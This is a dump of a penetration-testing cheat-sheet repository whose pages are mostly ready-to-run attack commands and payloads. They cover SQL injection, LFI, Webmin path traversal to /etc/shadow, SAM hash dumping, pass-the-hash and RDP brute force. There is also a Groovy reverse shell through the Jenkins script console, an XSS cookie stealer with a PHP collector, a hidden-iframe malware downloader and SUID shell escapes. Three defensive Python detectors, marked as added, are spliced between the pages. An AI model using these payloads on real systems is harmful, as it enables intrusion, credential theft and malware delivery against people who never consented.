```
├── CheatSheets
│   ├── 28533648.png
│   ├── mysql
│   │   └── readme.md
│   ├── RCE
│   │   └── README.md
│   ├── LFI
│   │   └── readme.md
│   ├── shell
│   │   └── readme.md
│   ├── grep.md
│   ├── encode
│   │   └── readme.md
│   ├── MSSQL
│   │   └── readme.md
│   ├── RPC
│   │   └── readme.md
│   ├── ssh
│   │   └── readme.md
│   ├── NFS
│   │   └── readme.md
│   ├── SMTP
│   │   └── readme.md
│   ├── pivoting
│   │   └── readme.md
│   ├── enum
│   │   └── readme.md
│   ├── windows
│   │   ├── priv_esc
│   │   │   ├── readme.md
│   │   │   ├── Invoke-MS16-032.ps1
│   │   │   └── WinPrivCheck.bat
│   │   ├── hashdump
│   │   │   └── readme.md
│   │   └── enumaration
│   │       └── readme.md
│   ├── pass_the_hash
│   │   └── readme.md
│   ├── RDP
│   │   └── readme.md
│   ├── SQLI
│   │   ├── sqlmap
│   │   │   └── readme.md
│   │   └── barehands
│   │       └── readme.md
│   ├── netcat
│   │   └── readme.md
│   ├── webmin
│   │   └── readme.md
│   ├── linux
│   │   ├── pos_xpl
│   │   │   ├── readme.md
│   │   │   └── LinEnum.sh
│   │   └── priv_esc
│   │       └── readme.md
│   ├── jenkins
│   │   └── readme.md
│   ├── SNMP
│   │   └── readme.md
│   ├── nmap
│   │   └── README.md
│   ├── XSS
│   │   └── readme.md
│   ├── DNS
│   │   └── readme.md
│   └── NetBIOS
│       └── readme.md
├── contribution.md
└── README.md
```

/CheatSheets/28533648.png:

https://raw.githubusercontent.com/lucthienphong1120/Pentest-Cheat-Sheets/HEAD/CheatSheets/28533648.png

/CheatSheets/mysql/readme.md:

# MYSQL

### Try default Root access

`mysql -h Target_ip -u root`

/CheatSheets/RCE/README.md:

# WEB Remote Code Execution

## Simple PHP RCE

``

/CheatSheets/LFI/readme.md:

# LFI PHP

### Situation

`http:///index.php?parameter=value`

### Test

`http:///index.php?parameter=php://filter/convert.base64-encode/resource=index`

### Take a look at the bloody thing

/CheatSheets/shell/readme.md:

# Windows Shell

## pth-winexe

### With Pass

`pth-winexe -U % //Target_IP cmd`

`pth-winexe -U bob%alice //172.10.1.60 cmd`

### Pass The Hash

`pth-winexe -U bob%hash //172.16.1.60 cmd`

/CheatSheets/grep.md:

# Taking Users to bruteforce

## smb

Using enum4linux

`./enum4linux.pl -U 192.168.1.113 | grep 'user:' | cut -d'[' -f2 | cut -d']' -f1 > Users`

Using nmap *smb-enum-users.nse*

`nmap 192.168.1.113 --script smb-enum-users.nse | grep "Full name:"`

/CheatSheets/encode/readme.md:

# Web encode to read PHP files

## Burp Suite encode Trick

`GET /?page='php://filter/convert.base64-encode/resource'=`

`GET /?page=php://filter/convert.base64-encode/resource=config`

After this you can decode the result with Burp Suite's decoder or with `base64 -d` in a Linux terminal.

/CheatSheets/MSSQL/readme.md:

# MS SQL

### Nmap Information Gathering

`nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`

/CheatSheets/RPC/readme.md:

# RPC - Remote Procedure Call

### rpcclient

Connect to an RPC share without a username and password and enumerate privileges

`rpcclient --user="" --command=enumprivs -N 172.20.10.5`

Connect to an RPC share with a username and enumerate privileges

`rpcclient --user="" --command=enumprivs 172.20.10.5`

### rpcinfo

/CheatSheets/ssh/readme.md:

# SSH

## Tunnels

### Simple ssh tunnel

`ssh -L :target: @tunnel_ip -p`

`ssh -L 3389:10.0.0.1:3389 user@192.168.101.11 -p 2222`

### Creating VPN tunnel through ssh to any subnet

`sshuttle -e "ssh <-i id_rsa_priv.key>" -r user@tunnel_ip &`

`sshuttle -e "ssh -i bob.key" -r bob@10.0.1.1 192.168.1.0/24 192.168.25.0/24 &`

/CheatSheets/NFS/readme.md:

# NFS - Network File System

### Nmap Show Mountable NFS Shares

`nmap -sV --script=nfs-showmount 192.168.1.110`
### Show nfs

`showmount -e target_IP`

`showmount -e 192.168.1.110`

### Mount directory

`mkdir /mnt/name_folder`

`mount -t nfs target_ip:/ /mnt/name_folder -o nolock`

### nfspy

`sudo nfspy -o server=Target_IP:/home/Path,nfsport=2049/tcp,rw /tmp/path_to_Mount`

/CheatSheets/SMTP/readme.md:

# SMTP

### netcat

Enum Users

`nc -vn target 25`

`VRFY User_to_test`

`VRFY root`
answer `252 2.0.0 root` means that this user exists here.

`VRFY bla`
answer `550 5.1.1` means that bla doesn't exist here.

## Got users and Pass?

### Reading emails using Telnet

`telnet Ip_target port`

```
$telnet 172.20.10.2 110
USER username
PASS password

list

retr 1

```

/CheatSheets/pivoting/readme.md:

# Pivoting
---

## VPNPivot

#### On attacker machine

`$ sudo pivots -i -p -H -v`

* __iface__ - the virtual interface for the VPN itself; for example, OpenVPN often creates tap0 or tun0, but you can choose whatever you want, like pwn0;
* __mac__ - MAC address for the newly created device;
* __port__ - whatever unused port you want

#### On target machine

`$ sudo pivotc `

/CheatSheets/enum/readme.md:

# Web Enumeration

## Dirb

Default wordlist

`dirb http://target_site.com`

Wordlist

`dirb http://target_site.com /usr/share/wordlist/dirbuster/WORDLIST`

Extensions

`dirb http://target_site.com -X .php,.txt,.bak,.old`

## Gobuster

`gobuster -w /usr/share/wordlists/dirb/common.txt -u TARGET`

## Nikto

`nikto -h TARGET`

`nikto -useproxy http://PROXY:3128 -h TARGET`

## UNISCAN

`uniscan -qweds -u http://TARGET.com`

/CheatSheets/windows/priv_esc/readme.md:

# Windows Privilege Escalation

## Exploit ms16_032

wget [Invoke-MS16-032.ps1](https://github.com/kitsun3sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/windows/priv_esc/Invoke-MS16-032.ps1)

#### Upload it to the target and through the powershell command line execute:

```powershell
> powershell -ExecutionPolicy Bypass
> Import-Module .\Invoke-MS16-032.ps1
> Invoke-MS16-032
```

##### Done, if everything worked fine, you're now system user.

## WinPrivCheck.bat

##### Upload it to the target and run through terminal

```cmd
WinPrivCheck.bat
```

/CheatSheets/pass_the_hash/readme.md:

# Pass the hash

## Smb pass the hash

### Tool:

[pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)

#### Listing shared folders

`sudo pth-smbclient --user= --pw-nt-hash -m smb3 -L \\\\\\`

`sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 \\\\192.168.0.24\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadklad`

#### Interactive smb shell

`sudo pth-smbclient --user= --pw-nt-hash -m smb3 \\\\\\shared_folder`

`sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadklad`

/CheatSheets/RDP/readme.md:

# Remote Desktop Protocol

## xfreerdp

### Simple User Enumeration for Windows Target (kerberos based)

`xfreerdp /v: -sec-nla /u:""`

`xfreerdp /v:192.168.0.32 -sec-nla /u:""`

## login

`xfreerdp /u: /g: /p: /v:`

`xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34`

### Wordlist based bruteforce

### NCRACK

`ncrack -vv --user/-U --pass/-P :3389`

`ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389`

### Crowbar

`crowbar -b rdp <-u/-U user/user_wordlist> -c/-C -s /32 -v`

`crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v`
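The ncrack and crowbar lines above show up on the Windows side as a burst of Security event 4625 (failed logon) from one source address, sometimes followed by a 4624 (successful logon) once a password hits. The following is an added example, not part of the cheat sheet: it groups failures by source inside a sliding time window, flags sources that cross a threshold, and marks a later success from a flagged source. The event records are constructed for the demo; the tuple layout, thresholds and logon-type filter are this example's own assumptions.

```python
"""Detecting RDP password guessing from Windows Security events.

Added example (not part of the cheat sheet): groups event 4625 (failed
logon) by source address inside a sliding window, flags sources that cross
a threshold, and marks a 4624 (successful logon) that follows a burst.
SAMPLE_EVENTS is constructed for the demo, not real telemetry.
"""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: (timestamp, event_id, account, source_ip, logon_type).
# Logon type 10 = RemoteInteractive (RDP); 3 = Network (RDP with NLA is
# recorded as 3); 2 = Interactive (console), which is ignored below.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:02", 4625, "bob", "10.0.0.5", 10),
    ("2024-05-01T10:00:05", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:09", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:13", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:17", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:21", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:25", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:29", 4625, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:00:30", 4625, "bob", "10.0.0.5", 10),
    ("2024-05-01T10:00:40", 4624, "administrator", "192.168.0.16", 10),
    ("2024-05-01T10:01:00", 4624, "bob", "10.0.0.5", 10),
    # console typos: many failures, but logon type 2 is not remote
] + [
    ("2024-05-01T10:02:%02d" % s, 4625, "alice", "172.16.0.9", 2)
    for s in range(0, 60, 10)
] + [
    # slow guessing: five failures spread over eight minutes
    ("2024-05-01T10:%02d:00" % m, 4625, "svc", "192.168.0.50", 3)
    for m in (5, 7, 9, 11, 13)
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: alert} for every source with at least `threshold`
    failed remote logons inside some span of length `window`. An alert
    carries the burst start/end, accounts tried, total failures from that
    source, and whether a logon later succeeded from it."""
    recent = defaultdict(deque)   # source -> failure timestamps inside the window
    failures = Counter()          # source -> total failures seen
    accounts = defaultdict(set)   # source -> accounts attempted
    alerts = {}
    for ts_s, event_id, account, src, logon_type in sorted(events):
        if logon_type not in (3, 10):
            continue              # only remote logons matter for RDP guessing
        ts = datetime.fromisoformat(ts_s)
        if event_id == 4625:
            failures[src] += 1
            accounts[src].add(account)
            q = recent[src]
            q.append(ts)
            while ts - q[0] > window:     # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold and src not in alerts:
                alerts[src] = {"first": q[0], "last": ts,
                               "success_after_burst": False, "success_account": None}
            elif src in alerts:
                alerts[src]["last"] = ts
        elif (event_id == 4624 and src in alerts
              and ts - alerts[src]["last"] <= window):
            # a success shortly after a burst is the case worth paging on
            alerts[src]["success_after_burst"] = True
            alerts[src]["success_account"] = account
    for src, alert in alerts.items():
        alert["failures"] = failures[src]
        alert["accounts"] = sorted(accounts[src])
    return alerts


if __name__ == "__main__":
    for src, alert in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(src, alert)
```

With the defaults only 192.168.0.16 is flagged (eight failures in 28 seconds, then a successful logon 11 seconds after the last failure); bob's two typos and alice's console failures are not. Lowering the threshold and widening the window to ten minutes also catches the slow guessing from 192.168.0.50, which is the usual trade-off when tuning this rule.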
/CheatSheets/windows/hashdump/readme.md:

# Windows HashDump without metasploit

## Windows Passwords

### Reg Commands to get passwords' file

System file

`reg save HKLM\System system.hive`

SAM File

`reg save HKLM\SAM sam.hive`

### HASHDUMP

`samdump2 system.hive sam.hive`

#### Windows Repair

Backup files < Windows 2003

`c:\windows\repair`

Download sam and system.

`bkhive system key.txt`
`samdump2 sam key.txt`

### FGDump

Kali Path: /usr/share/windows-binaries/fgdump/fgdump.exe

### WCE

Kali Paths:
* /usr/share/wce/wce32.exe
* /usr/share/wce/wce64.exe
* /usr/share/wce/wce-universal.exe

Get pass

`wce-universal.exe`

Try to get pass into clear text

`wce-universal.exe -w`

/contribution.md:

# Contribution

## Tricks

1. Create a [GitHub](https://github.com) account.
2. Fork [Pentest-Cheat-Sheets](https://github.com/kitsun3sec/Pentest-Cheat-Sheets).
3. Clone GitHub forked Pentest-Cheat-Sheets repository:
   `git clone https://github.com/[YourGithubAccount]/Pentest-Cheat-Sheets`
4. Create a new branch:
   `git checkout -b branchname`
5. Add your code.
6. Add your code to the stage area
   `git add --all`
7. Commit
   `git commit -m "description of your trick"`
8. Push
   `git push -u origin branchname`

## Adding new Trick

1. You need to create a folder into **CheatSheets**.
   Example: `mkdir nmap`
2. Create a **readme.md** into this folder.
   `CheatSheets/* has many examples`
3. Add your NINJA tricks.

## Modifying one

1. Open the file using your favorite text editor
   `vim CheatSheets/ssh/readme.md`
2. Make your changes and send them to us

#### We really <3 You!

/CheatSheets/SQLI/sqlmap/readme.md:

# SQLI tricks

## GET

### Error-Based

### Simple test

`Adding a simple quote '`

Example: `http://192.168.1.104/Less-1/?id=5'`

### Checking Privileges

Using sqlmap

`./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE`

### Reading file

`./sqlmap.py -u --file-read=`

`./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd`

### Writing file

`./sqlmap.py -u --file-write= --file-dest=`

`./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php`

## POST

`./sqlmap.py -u --data=" "`

`./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p uname`

You can also use a file containing the POST request:

`./sqlmap.py -r post-request.txt -p uname`

/CheatSheets/netcat/readme.md:

# Netcat

## Port Scanner

One port
`nc -vnz `

`nc -nvz 192.168.1.23 80`

Port Range
`nc -vnz 192.168.1.23 0-1000`

## Send files

* Server

`nc -lvp 1234 > file`

* Client

`nc -vn < File_to_send`

`nc -vn 192.168.1.33 1234 < file_to_send`

## Executing remote script

* Server

`nc -lvp 1234 -e ping.sh`

* Client

`nc -vn 192.168.1.33 1234`

## Chat with encryption

* Server
`ncat -nlvp 8000 --ssl`

* Client
`ncat -nv 192.168.1.33 8000 --ssl`

## Banner Grabbing

```
nc target port
HTTP_Verb path http/version
Host: url
```

```
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br
```

##### If this site uses https you need to use openssl

Example:

`openssl s_client -quiet -connect www.bla.com.br:443`

/CheatSheets/webmin/readme.md:

# Webmin

`export ip=172.20.10.5`

### Test for LFI & file disclosure vulnerability by grabbing /etc/passwd

Some servers change the root path; if so, just adjust the URL path...

`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`

### Test to see if webmin is running as root by grabbing /etc/shadow

`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`

## You can use John to break it

`unshadow passwd shadow > Hash`

### Resources
* [CVE: CVE-2006-3392](https://www.exploit-db.com/exploits/2017/)
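The LFI and encode sections (the `php://filter/convert.base64-encode` wrapper) and the Webmin section (the `..%01/` traversal that slips past a naive `../` check) all leave a distinctive trace in the web server's access log. The following is an added example, not code from the cheat sheet: a small scanner over combined-format log lines that URL-decodes each request path (twice, to unfold `%252e`-style double encoding), then flags stream wrappers, `..` followed by control characters or a slash, and well-known sensitive file names. The log lines are constructed for the demo and the indicator names are this example's own.

```python
"""Flagging LFI / path-traversal probes in web access logs.

Added example (not part of the cheat sheet). SAMPLE_LOG is constructed;
the indicator labels (php_wrapper, traversal, sensitive_file) are ours.
"""
import re
from urllib.parse import unquote

# Apache/nginx combined log format: ip ident user [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
WRAPPER_RE = re.compile(r'(?:php|phar|data|expect|zip)://', re.I)
# ".." followed by any control characters (Webmin's ..%01) and then a slash or backslash
TRAVERSAL_RE = re.compile(r'\.\.[\x00-\x1f]*[\\/]')
SENSITIVE_RE = re.compile(r'/etc/(?:passwd|shadow)|win\.ini|boot\.ini|\.htpasswd', re.I)

SAMPLE_LOG = [
    '192.168.1.50 - - [01/May/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123',
    '192.168.1.50 - - [01/May/2024:10:00:05 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2310',
    '10.0.0.7 - - [01/May/2024:10:01:00 +0000] "GET //unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 1844',
    '10.0.0.7 - - [01/May/2024:10:01:03 +0000] "GET /download?file=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 199',
    '10.0.0.7 - - [01/May/2024:10:01:06 +0000] "GET /download?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210',
    '192.168.1.51 - - [01/May/2024:10:02:00 +0000] "GET /search?q=hello..world HTTP/1.1" 200 901',
]


def normalize(path):
    """URL-decode up to twice so %252e%252e%252f is seen as ../ too."""
    prev = path
    for _ in range(2):
        cur = unquote(prev)
        if cur == prev:
            break
        prev = cur
    return prev


def classify(path):
    """Return the list of indicators matched by a request path ([] if clean)."""
    norm = normalize(path)
    hits = []
    if WRAPPER_RE.search(norm):
        hits.append("php_wrapper")
    if TRAVERSAL_RE.search(norm):
        hits.append("traversal")
    if SENSITIVE_RE.search(norm):
        hits.append("sensitive_file")
    return hits


def scan_log(lines):
    """Parse combined-format lines and return one finding per suspicious request.
    A 200 next to a sensitive_file hit is the one to chase first: it means
    the server most likely handed the file over."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # not a request line we understand
        hits = classify(m["path"])
        if hits:
            findings.append({"ip": m["ip"], "path": m["path"],
                             "status": int(m["status"]), "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["status"], f["ip"], f["indicators"], f["path"])
```

Decoding before matching is the point: the raw Webmin request never contains the literal string `../`, and the double-encoded line only becomes `../etc/passwd` on the second pass. The `hello..world` query shows why the traversal pattern insists on a separator after the dots.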
/CheatSheets/windows/enumaration/readme.md:

# Windows OS Enumeration

## System Information

`systeminfo`

`systeminfo | findstr /B /C:"OS Name" /C:"OS Version"`

## users

`net users`

## Info about a user

`net user USER`

Change USER PASSWORD

`net user USER NEW_PASSWORD`

add User

`net users USER /add`

## Adding a user into a group

`net group Administrators USER /add`

`net localgroup Administrators USER /add`

`net group "Remote Desktop Users" USER /add`

## groups

`net groups`

`net localgroups`

## Whoami

`whoami`

`whoami /all`

## Network info

IP / Interfaces

`ipconfig /all`

Routes

`route print`

ARP table

`arp -a`

## List process

`tasklist`

## Query current drives on system

`fsutil fsinfo drives`

## RDP

list active sessions (RDP sessions included)

`qwinsta`

/CheatSheets/linux/pos_xpl/readme.md:

# Post-Exploitation on Linux

## Data Harvesting and Enumeration

### Common users

`awk -F: '{ if($3 >= 1000) print $1}' passwd >> users`

### Reading bash_history files

Mapping users directories

`ls /home/ > users_home`

Reading files

`for user in $(cat users_home); do echo $user; cat /home/$user/.bash_history ; echo -e "=====\n" ;done`

### Using great scripts

LinEnum.sh

wget [LinEnum.sh](https://raw.githubusercontent.com/kitsun3sec/Pentest-Cheat-Sheets/master/CheatSheets/pos_xpl/LinEnum.sh)

#### Upload it to the target and run through terminal

```bash
> chmod +x LinEnum.sh
> ./LinEnum.sh -t
```

#### Done, now pay attention to the output and see if there is anything *interesting*

## OTHER SCRIPTS

* [LinuxPrivChecker](https://www.securitysift.com/download/linuxprivchecker.py)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [High Coffee](https://highon.coffee/downloads/linux-local-enum.sh)

/CheatSheets/jenkins/readme.md:

# Jenkins

## Reverse Shell via Jenkins

Go to Jenkins script console:

`https://target-jenkins/script`

Execute the following `Groovy` script to send you the reverse shell on port 8080:

```groovy
String host="ATTACKERS-IP-HERE";
int port=8080;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

> Don't forget to set up your listener before running the script

## Decoding a Jenkins encrypted password

Go to Jenkins script console:

`https://target-jenkins/script`

Execute the following `Groovy` script to decode the encrypted information

```groovy
hashed_pw='{ENC_PASS_HERE}'
passwd = hudson.util.Secret.decrypt(hashed_pw)
println(passwd)
```
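The "Common users" one-liner in the Linux post-exploitation section above (`awk -F: '{ if($3 >= 1000) print $1}' passwd`) selects human accounts by UID. The following is an added example, not part of the cheat sheet, and it goes a step beyond the page: it parses `/etc/passwd` records into fields, reproduces the UID selection, and then runs the checks an administrator auditing the same file would want: extra UID 0 accounts, accounts with an empty password field, and system accounts that kept a login shell. The passwd text is constructed for the demo; the shell list and thresholds are this example's own assumptions.

```python
"""Auditing /etc/passwd: human accounts plus common misconfigurations.

Added example (not part of the cheat sheet). SAMPLE_PASSWD is constructed
for the demo; NOLOGIN_SHELLS and the UID cut-offs are our assumptions.
"""

# Shells that deny interactive login on common distributions
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}

# Constructed sample: two planted problems (toor, guest) and one sloppy one (backup)
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
bob:x:1000:1000:Bob:/home/bob:/bin/bash
alice:x:1001:1001:Alice:/home/alice:/bin/zsh
backup:x:34:34:backup:/var/backups:/bin/sh
toor:x:0:0:backdoor:/root:/bin/bash
guest::1002:1002::/home/guest:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""


def parse_passwd(text):
    """Split passwd(5) records into dicts; malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = parts
        users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def human_accounts(users, min_uid=1000):
    """Same selection as the awk one-liner, minus the nobody pseudo-account."""
    return [u["name"] for u in users if min_uid <= u["uid"] < 65534]


def audit(users):
    """Return (account, finding) pairs for the misconfigurations checked."""
    findings = []
    for u in users:
        if u["uid"] == 0 and u["name"] != "root":
            findings.append((u["name"], "uid 0 account that is not root"))
        if u["pw"] == "":
            # "x" means the hash lives in /etc/shadow; "" means no password at all
            findings.append((u["name"], "empty password field (no password required)"))
        if 0 < u["uid"] < 1000 and u["shell"] not in NOLOGIN_SHELLS:
            findings.append((u["name"], "system account with login shell " + u["shell"]))
    return findings


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    print("human accounts:", human_accounts(users))
    for name, finding in audit(users):
        print(f"{name}: {finding}")
```

On a real host read the text with `open("/etc/passwd").read()`; the empty-password check only says something when the second field is used directly, which is exactly the legacy setup it is meant to catch.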
/CheatSheets/SNMP/readme.md:

# SNMP

### Fixing SNMP output

`apt-get install snmp-mibs-downloader && download-mibs`

`echo "" > /etc/snmp/snmp.conf`

### OneSixtyone

`onesixtyone -c COMMUNITY -i Target_ip`

`onesixtyone -c community.txt -i Found_ips.txt`

### snmpwalk

Walking MIBs

`snmpwalk -c COMMUNITY -v VERSION target_ip`

`snmpwalk -c public -v1 192.168.25.77`

Specific MIB node

`snmpwalk -c community -v version Target_IP MIB_Node`

Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25

`snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25`

### snmp-check

`snmp-check -t target_IP` | `snmp-check -t TARGET -c COMMUNITY`

`snmp-check -t 172.20.10.5`

`snmp-check -t 172.20.10.5 -c public`

### Automate the username enumeration process for SNMPv3

`apt-get install snmp snmp-mibs-downloader`

`wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`

### NMAP SNMPv3 Enumeration

`nmap -sV -p 161 --script=snmp-info 172.20.10.0/24`

### Default Credentials

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

/CheatSheets/nmap/README.md:

# NMAP CHEAT SHEETS

Set the ip address as a variable
`export ip=192.168.1.100`
`export netw=192.168.1.0/24`

### Detecting Live Hosts
Only IPs

`nmap -sn -n $netw | grep for | cut -d" " -f5`

### Stealth Scan

`nmap -sS $ip`

Only Open Ports and Banner Grab

`nmap -n -Pn -sS $ip --open -sV`

Stealth scan using FIN Scan

`nmap -sF $ip`

### Aggressive scan

Without ping, no DNS resolution, show only open ports and test all TCP ports

`nmap -n -Pn -sS -A $ip --open -p-`

Nmap verbose scan, runs SYN stealth, T4 timing, OS and service version info, traceroute and scripts against services

`nmap -v -sS -A -T4 $ip`

### OS Fingerprint

`nmap -O $ip`

### Quick Scan

`nmap -T4 -F $netw`

### Quick Scan Plus

`nmap -sV -T4 -O -F --version-light $netw`

### output to a file

`nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip`

### output to a file Plus

`nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw`

### Search NMAP scripts

`ls /usr/share/nmap/scripts/ | grep ftp`

* [Nmap Discovery](https://nmap.org/nsedoc/categories/discovery.html)

/CheatSheets/linux/priv_esc/readme.md:

# Privilege Escalation

### Try the obvious - Maybe the user can sudo to root:

`sudo su`

### List all SUID files

`find / -perm -4000 2>/dev/null`

`find / -user root -perm -4000 -print 2>/dev/null`

`find / -perm -u=s -type f 2>/dev/null`

`find / -user root -perm -4000 -exec ls -ldb {} \;`

Nmap version [2.02 - 5.21]

`nmap -V`

`nmap --interactive`

`nmap> !sh`

### Performing privilege escalation by misconfigured SUID

#### Find

`touch kitsun3sec` && `find kitsun3sec -exec whoami \;`

if root

`find kitsun3sec -exec netcat -lvp 5555 -e /bin/sh \;`

#### vim.tiny

`vim.tiny /etc/shadow`

```
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
```

#### Bash

`bash -p`
`whoami`

#### Less

```
less /etc/passwd
!/bin/sh
```

### Listing process

`ps aux`

`ps xaf`

### Determine the current version of Linux

`cat /etc/issue`

`lsb_release -a`

### Determine more information about the environment

`uname -a`

## Searchsploit

`searchsploit linux 2.6`

`searchsploit centos 6`

/CheatSheets/XSS/readme.md:

# XSS tricks

## Reflected

### Simple test
This is a simple test to see what happens; on its own it is not proof that the field is vulnerable to XSS

``

### Simple XSS test

`<script>alert('Found')</script>`

`"><script>alert(Found)</script>">`

`<script>alert(String.fromCharCode(88,83,83))</script>`

### Bypass filter of tag script

`" onload="alert(String.fromCharCode(88,83,83))`

`" onload="alert('XSS')`

bla is not a valid image, so this causes an error

`<img src='bla' onerror=alert("XSS")>`

## Persistent

`>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>";`

### PHP collector

`> cookie.txt`
`chmod 777 cookie.txt`

edit a php page like colector.php as follows:

```php
<?php
$cookie=$_GET['cookie'];
$useragent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookie.txt', 'a');
fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n");
fclose($file);
?>
```

Script to put in page:

`<script>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script>`

### Malware Downloader via XSS

`<iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe>`

/CheatSheets/DNS/readme.md:

# DNS Enumeration

## Nslookup

Resolve a given hostname to the corresponding IP.

`nslookup targetorganization.com`

## Reverse DNS lookup

`nslookup -type=PTR IP_address`

## MX (Mail Exchange) lookup

`nslookup -type=MX domain`

## Zone Transfer

### Using nslookup Command

`nslookup`
`server domain.com`
`ls -d domain.com`

### Using HOST Command

`host -t ns <domain>` (ns = Name Server)

`host -t ns domain.com`

after that test the nameservers

`host -l <domain> <nameserver>`

`host -l domain.com ns2.domain.com`

### Nmap DNS Enumeration

`nmap -F --dns-server <dns server ip> <target ip range>`

## Auto tools

### DNSenum

`dnsenum targetdomain.com`

`dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com`

### DNSmap

`dnsmap targetdomain.com`

`dnsmap targetdomain.com -w <Wordlist file.txt>`

Brute Force, the file is saved in /tmp

`dnsmap targetdomain.com -r`

### DNSRecon DNS Brute Force

`dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml`

### Fierce.pl

`fierce -dns targetdomain.com`

### HostMap

`hostmap.rb -only-passive -t <IP>`

We can use -with-zonetransfer or -bruteforce-level

### Online Tools

* https://dnsdumpster.com/
* https://network-tools.com/nslook/
* https://www.dnsqueries.com/en/
* https://mxtoolbox.com/
